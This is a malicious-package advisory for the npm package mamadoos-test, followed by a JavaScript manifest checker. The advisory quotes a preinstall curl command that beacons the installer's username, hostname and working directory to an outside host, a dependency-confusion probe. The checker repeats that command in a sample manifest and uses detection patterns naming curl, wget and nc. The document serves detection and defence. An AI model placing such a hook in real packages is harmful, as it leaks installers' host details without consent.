mamadoos-test @11.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID: MAL-2026-4605
Ecosystem: npm
Summary
package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$(whoami)@$(hostname)?pwd=$(pwd), embedding the installer's OS username, hostname, and current working directory into the URL path/query. This fires unconditionally on npm install with no opt-in, leaking host-identifying information to a third-party endpoint. The package additionally declares itself as a dependency (mamadoos-test: ^10.0.0), a shape consistent with a dependency-confusion probe: installs of a colliding internal name resolve to this public package and beacon back. Regardless of whether the intent is research or active targeting, the installer-side effect is unconsented exfiltration of identifiers useful for follow-on attacks (locating internal hosts, mapping CI environments, fingerprinting build paths).
Source: amazon-inspector (21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4)
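A manifest check for the two traits the summary describes, added here as an example and not taken from the report or from amazon-inspector: an install-time hook that calls a network tool with shell command substitution, and a package listing itself as a dependency. The function name, rule names and both sample manifests are assumptions constructed for illustration; the first sample is rebuilt from the summary text, not copied from the package.

```javascript
// Lifecycle scripts that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const NETWORK_TOOL = /\b(curl|wget|nc|ncat)\b/i;
// Shell command substitution: $(...) or `...`
const CMD_SUBST = /\$\([^)]*\)|`[^`]*`/g;
const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies", "peerDependencies"];

function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const substitutions = cmd.match(CMD_SUBST) || [];
    if (NETWORK_TOOL.test(cmd)) {
      // Substitutions inside a network call mean host data is sent at install time.
      const rule = substitutions.length ? "install-hook-beacon" : "install-hook-network";
      findings.push({ rule, hook, substitutions });
    }
  }
  for (const field of DEP_FIELDS) {
    const deps = manifest[field] || {};
    if (Object.prototype.hasOwnProperty.call(deps, manifest.name)) {
      findings.push({ rule: "self-dependency", field, range: deps[manifest.name] });
    }
  }
  return findings;
}

// Constructed manifest mirroring the summary (not the package's actual file).
const reported = {
  name: "mamadoos-test",
  version: "11.0.0",
  scripts: { preinstall: "curl https://huntr.site/depconf/$(whoami)@$(hostname)?pwd=$(pwd)" },
  dependencies: { "mamadoos-test": "^10.0.0" },
};
// Constructed benign manifest for comparison.
const benign = {
  name: "example-lib",
  scripts: { test: "node test.js", postinstall: "node scripts/build.js" },
  dependencies: { "left-pad": "^1.3.0" },
};

for (const m of [reported, benign]) console.log(m.name, JSON.stringify(auditManifest(m)));
```

Run against unpacked tarballs or a registry metadata response before install; installing with npm's --ignore-scripts option keeps lifecycle hooks from firing while a package is under review.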